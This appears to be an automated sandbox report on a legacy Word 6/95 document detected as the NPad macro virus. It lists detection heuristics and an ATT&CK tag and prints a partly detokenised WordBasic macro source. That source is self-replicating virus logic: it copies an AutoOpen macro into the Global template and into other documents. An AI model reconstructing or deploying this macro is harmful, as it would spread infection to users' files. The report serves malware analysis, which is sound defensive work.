Verdict: MALICIOUS
Risk Score: 102
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample exhibits legacy WordBasic macro virus markers and is explicitly detected by ClamAV as Win.Trojan.NPad-1. The document body contains numerous strings related to macro virus functions and historical context, including references to 'RSN MACRO VIRUS' and 'NPad', indicating its nature as a macro-based threat. The presence of 'AutoOpen' suggests automatic execution upon opening.
Heuristics 3
- ClamAV: Win.Trojan.NPad-1 (severity: critical, rule: CLAMAV_DETECTION). ClamAV detected this file as malware: Win.Trojan.NPad-1
- Legacy WordBasic macro-virus markers (severity: high, rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS). OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- Recovered legacy WordBasic macro source (severity: info, rule: OLE_LEGACY_WORDBASIC_MACRO_SOURCE). The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| wordbasic_macros.txt | wordbasic-macro | analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) | 1588 bytes |

SHA-256: db1e6b786a098c6660cd7e679f01e539cab3e99950e71edd43860ebabc13dfc2

Preview script (first 1,000 lines of the extracted script):
= REM D0EUNPAD94, v.2.21, (c)'Maret 1996, Bandung, Indonesia REM Macro MsWord virus, multiplatform, multi versi MacDoc$ Status MAIN @cmd809e 1 @cmd80d6 0 , - * finish MacDoc$ = @cmd818e CopyToGlobal Status 0 CopyToFile JAkses$ = @cmd8045 " Compatibility " , "NPad328" Bcopytoall = @cmd8006 Jakses$ Bcopytoall = 23 Aksi Bcopytoall 23 Jopen = Bcopytoall = 1 Bcopytoall = 23 Jopen = 0 Jakses$ = @cmd8007 jOpen @cmd8046 "Compatibility" , "NPad328" , JAkses$ err 0 aksi CopyToGlobal , - * finish MacVir$ = MacDoc$ = ":AutoOpen" Encrypt = @cmd80c3 MacVir$ Encrypt 0 @cmd80c2 MacVir$ , "Global:AutoOpen" , 1 Encrypt = 0 Status = 1 Encrypt 0 Status = err CopyToFile , - * finish dlg @cmd0054 dlg DocFormat = dlg DocFormat 1 * finish MacVir$ = MacDoc$ = ":AutoOpen" MacTDoc$ = @cmd8025 = ":AutoOpen" DocFormat 1 @cmd0054 = @cmd8025 , = 1 Encrypt = @cmd80c3 MacVir$ Encrypt 0 @cmd80c2 MacVir$ , MacTDoc$ , 1 @cmd0053 Aksi , - * finish Jarak$ = " " me$ = "D0EUNPAD94, v.2.21, (c) Maret 1996, Bandung, Indonesia" my$ = jarak$ = me$ KeKanan my$ , 30 KeKiri my$ , 15 , 10 GeserKanan me$ , 15 , 15 KeKiri my$ , 15 , 30 GeserKanan Me$ , 15 , 45 KeKiri My$ , @cmd8003 my$ , 100 GeserKanan kal$ , jumlah , waktu kal1$ = kal$ hitung = 1 jumlah kal1$ = " " = kal1$ kal1$ Tunggu waktu hitung KeKanan Kal$ , Waktu hitung = 0 @cmd8003 kal$ letak = hitung Myname$ = @cmd8009 Kal$ , Letak myname$ Tunggu waktu hitung KeKiri Kal$ , batas , Waktu hitung = 0 batas letak = @cmd8003 Kal$ hitung Myname1$ = @cmd8009 Kal$ , Letak myname1$ Tunggu Waktu hitung Tunggu waktu hitungan = 0 waktu hitungan |